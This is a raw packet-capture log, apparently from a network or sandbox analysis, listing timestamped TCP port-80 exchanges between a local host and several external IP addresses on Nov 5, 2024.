                                                                            Nov 5, 2024 15:23:26.402157068 CET5559480192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.420404911 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.425525904 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:27.425709009 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.431590080 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:27.437757015 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155177116 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155280113 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155294895 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155330896 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.155759096 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155771017 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155790091 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.155881882 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.155894041 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.156426907 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.156440020 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.156456947 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.156483889 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.157272100 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.157316923 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.162250996 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.162492037 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.162576914 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.194165945 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:28.194256067 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.195265055 CET5560980192.168.2.4209.74.95.29
                                                                            Nov 5, 2024 15:23:28.202564001 CET8055609209.74.95.29192.168.2.4
                                                                            Nov 5, 2024 15:23:33.576061964 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:33.581372976 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:33.581469059 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:33.592297077 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:33.597886086 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.284486055 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.284665108 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.284729004 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:34.326970100 CET8055644136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:34.327063084 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:35.105376959 CET5564480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.124418974 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.129391909 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.129477978 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.140371084 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.145656109 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.827424049 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.827519894 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.834522009 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:36.870414972 CET8055659136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:36.870510101 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:37.652160883 CET5565980192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.670649052 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.675769091 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.675882101 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.686458111 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:38.691458941 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691474915 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691485882 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691494942 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691509962 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691519976 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691553116 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691597939 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:38.691606998 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:39.363715887 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:39.407413006 CET8055674136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:39.407521009 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:40.199044943 CET5567480192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.218358040 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.223268032 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.223356962 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.230813980 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.236013889 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940274954 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940345049 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940356016 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940645933 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940660000 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940670967 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.940689087 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.940826893 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.992619038 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:41.992815971 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.993711948 CET5568680192.168.2.4136.143.186.12
                                                                            Nov 5, 2024 15:23:41.998651028 CET8055686136.143.186.12192.168.2.4
                                                                            Nov 5, 2024 15:23:47.528799057 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:47.533922911 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:47.534003019 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:47.544778109 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:47.549683094 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:48.412935972 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:48.464607000 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:48.551155090 CET8055722133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:48.551270008 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:49.058547020 CET5572280192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.077721119 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.082777977 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:50.085688114 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.096906900 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:50.101878881 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:50.978941917 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:51.027180910 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:51.119215965 CET8055729133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:51.119297028 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:51.605717897 CET5572980192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.627640963 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.634058952 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.636512995 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.651947975 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:52.656888962 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.656928062 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.656940937 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.656950951 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657011032 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657202005 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657280922 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657290936 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:52.657301903 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:53.540708065 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:53.581374884 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:53.678941965 CET8055730133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:53.678997993 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:54.152332067 CET5573080192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.171365023 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.176407099 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:55.177015066 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.185609102 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:55.190433979 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:56.084033966 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:56.136507988 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:56.220732927 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:23:56.220855951 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:56.221645117 CET5573180192.168.2.4133.130.35.90
                                                                            Nov 5, 2024 15:23:56.226463079 CET8055731133.130.35.90192.168.2.4
                                                                            Nov 5, 2024 15:24:01.251257896 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:01.256169081 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:01.256253958 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:01.269614935 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:01.274610043 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:01.885379076 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:01.885452032 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:02.777441025 CET5573280192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:02.782736063 CET80557323.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:03.796253920 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:03.801270008 CET80557333.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:03.801342010 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:03.812220097 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:03.817135096 CET80557333.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:05.324202061 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:05.330044031 CET80557333.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:05.330319881 CET5573380192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.343986034 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.348908901 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.349006891 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.362786055 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:06.367731094 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367793083 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367803097 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367815018 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367889881 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.367923021 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.368470907 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.368503094 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:06.368923903 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:07.006325960 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:07.009732008 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:07.870980024 CET5573480192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:07.875921965 CET80557343.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:08.889712095 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:08.894768000 CET80557353.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:08.895840883 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:08.902976990 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:08.907819986 CET80557353.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:09.524441957 CET80557353.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:09.524956942 CET80557353.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:09.525201082 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:09.528038025 CET5573580192.168.2.43.33.130.190
                                                                            Nov 5, 2024 15:24:09.533004999 CET80557353.33.130.190192.168.2.4
                                                                            Nov 5, 2024 15:24:14.661670923 CET5573680192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:14.666683912 CET805573631.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:14.669982910 CET5573680192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:14.681673050 CET5573680192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:14.686958075 CET805573631.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:15.568255901 CET805573631.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:15.620965958 CET5573680192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:15.715382099 CET805573631.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:15.715459108 CET5573680192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:16.183803082 CET5573680192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:17.205662012 CET5573780192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:17.210777044 CET805573731.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:17.213824987 CET5573780192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:17.225663900 CET5573780192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:17.230645895 CET805573731.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:18.122412920 CET805573731.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:18.167829037 CET5573780192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:18.280154943 CET805573731.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:18.280205011 CET5573780192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:18.732161045 CET5573780192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:19.750363111 CET5573880192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:19.755717993 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.755798101 CET5573880192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:19.770385981 CET5573880192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:19.775341988 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775418043 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775432110 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775440931 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775451899 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775573969 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775594950 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775604963 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:19.775614977 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:20.667485952 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:20.714806080 CET5573880192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:20.829792023 CET805573831.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:20.833734989 CET5573880192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:21.277368069 CET5573880192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:22.296545982 CET5573980192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:22.301505089 CET805573931.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:22.301594973 CET5573980192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:22.308820009 CET5573980192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:22.314042091 CET805573931.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:23.207484961 CET805573931.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:23.261898994 CET5573980192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:23.352957964 CET805573931.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:23.357059002 CET5573980192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:23.361681938 CET5573980192.168.2.431.31.196.17
                                                                            Nov 5, 2024 15:24:23.366547108 CET805573931.31.196.17192.168.2.4
                                                                            Nov 5, 2024 15:24:28.445406914 CET5574080192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:28.450330973 CET8055740172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:28.450428963 CET5574080192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:28.463275909 CET5574080192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:28.468439102 CET8055740172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:29.117005110 CET8055740172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:29.154464006 CET8055740172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:29.154608965 CET5574080192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:29.964831114 CET5574080192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:30.983603954 CET5574180192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:30.989000082 CET8055741172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:30.989176035 CET5574180192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:31.001791954 CET5574180192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:31.006946087 CET8055741172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:31.683357954 CET8055741172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:31.721051931 CET8055741172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:31.721129894 CET5574180192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:32.511883974 CET5574180192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:33.531801939 CET5574280192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:33.537313938 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.539829016 CET5574280192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:33.551889896 CET5574280192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:33.557034016 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557157040 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557167053 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557176113 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557650089 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557660103 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557795048 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557804108 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:33.557811975 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:34.222491980 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:34.222570896 CET8055742172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:34.222625017 CET5574280192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:35.058634996 CET5574280192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:36.078192949 CET5574380192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:36.083198071 CET8055743172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:36.083278894 CET5574380192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:36.092660904 CET5574380192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:36.097656012 CET8055743172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:36.741720915 CET8055743172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:36.778269053 CET8055743172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:36.778517962 CET5574380192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:36.779473066 CET5574380192.168.2.4172.96.187.60
                                                                            Nov 5, 2024 15:24:36.784535885 CET8055743172.96.187.60192.168.2.4
                                                                            Nov 5, 2024 15:24:41.893739939 CET5574480192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:41.899352074 CET8055744161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:41.899430037 CET5574480192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:41.957206011 CET5574480192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:41.962166071 CET8055744161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:42.789812088 CET8055744161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:42.789833069 CET8055744161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:42.790343046 CET5574480192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:42.920727015 CET8055744161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:42.920901060 CET5574480192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:43.465739012 CET5574480192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:44.683803082 CET5574580192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:44.688685894 CET8055745161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:44.692817926 CET5574580192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:44.715219021 CET5574580192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:44.720206976 CET8055745161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:45.556924105 CET8055745161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:45.557122946 CET8055745161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:45.557369947 CET5574580192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:45.684079885 CET8055745161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:45.684143066 CET5574580192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:46.230537891 CET5574580192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:47.292375088 CET5574680192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:47.298070908 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.298163891 CET5574680192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:47.309850931 CET5574680192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:47.314795971 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.314810991 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.314997911 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.315011978 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.315023899 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.315035105 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.315047026 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.315248966 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:47.315260887 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:48.166568995 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:48.166595936 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:48.166702986 CET5574680192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:48.292777061 CET8055746161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:48.292912960 CET5574680192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:48.824285030 CET5574680192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:49.847250938 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:49.852425098 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:49.852499962 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:49.918874025 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:49.924979925 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.688800097 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.688812971 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.688824892 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.688972950 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.689017057 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:50.689110994 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:50.690660000 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.730494976 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:50.815272093 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:50.815408945 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:50.817756891 CET5574780192.168.2.4161.97.142.144
                                                                            Nov 5, 2024 15:24:50.822701931 CET8055747161.97.142.144192.168.2.4
                                                                            Nov 5, 2024 15:24:55.850836992 CET5574880192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:55.855720997 CET805574813.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:24:55.855782986 CET5574880192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:55.883507013 CET5574880192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:55.888308048 CET805574813.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:24:56.545526981 CET805574813.248.169.48192.168.2.4
